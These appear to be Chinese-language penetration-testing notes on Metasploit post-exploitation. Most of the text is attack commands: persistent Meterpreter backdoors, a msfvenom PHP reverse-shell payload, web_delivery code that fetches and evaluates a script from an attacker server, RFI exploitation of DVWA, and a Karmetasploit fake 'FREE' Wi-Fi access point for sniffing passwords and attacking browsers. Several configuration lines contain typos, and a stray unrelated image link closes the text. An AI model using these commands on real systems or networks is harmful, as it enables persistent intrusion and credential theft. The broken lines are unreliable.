持续后门
○ 利用漏洞取得的meterpreter shell运行于内存中,重启失效
○ 重复exploit漏洞可能造成服务崩溃
○ 持久后门保证漏洞修复后仍可远程控制
Meterpreter后门
run metsvc -A #删除-r
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 1.1.1.1
MSF延申用法
PHP shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
○ MSF启动侦听
○ 上传到web站点并通过浏览器访问
Web Delivery
○ 利用代码执行漏洞访问攻击者服务器
use exploit/multi/script/web_delivery
set target 1
php -d allow_url_fopen=true -r
"eval(file_get_contents('http://1.1.1.1/fTYWqmu'));"
RFI远程文件包含
vi /etc/php5/cgi/php.ini
allow_url_fogen = On
allow_url_include = On
use exploit/unix/webapp/php_include
set RHOST 1.1.1.2
set PATH /dvwa/vulnerabilities/fi/
set PHPURL /?page=XXpathXX
set HEADERS "Cookie:security=low; PHPSESSID=eefcf023ba61219d4745ad7487fe81d7"
set payload php/meterpreter/reverse_tcp
set lhost 1.1.1.1
exploit
Karmetasploit
○ 伪造AP、嗅探密码、截获数据、浏览器攻击
wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt
○ 安装其他依赖包
gem install activerecord sqlite3-ruby
基础架构安装配置
apt-get install isc-dhcp-server
cat /etc/dhcp/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
aythoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0{
range 10.0.0.100 10.0.0.254
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
伪造AP
airmon-ng start wlan0
airbase-ng -P -C 30 -e "FREE" -v wlan0mon
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
touch /var/lib/dhcp/dhcpd.leases
dhcpd -cf /etc/dhcp/dhcpd.conf at0
启动Karmetasploit
msfconsole -q -r karma.rc_.txt
允许用户正常上网
○ vi karma.rc_.txt
○ 删除setgcanshu
○ 增加browser_autopwn2等其他模块
○ 检查恶意流量:auxiliary/vsploit/malware/dns*
○ 再次启动Karmetasploit
添加路由和防火墙规则
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -P FORWARE ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
![[22]. 括号生成](https://img-blog.csdnimg.cn/2c9c24e796b840768bf90a5e30703437.png)
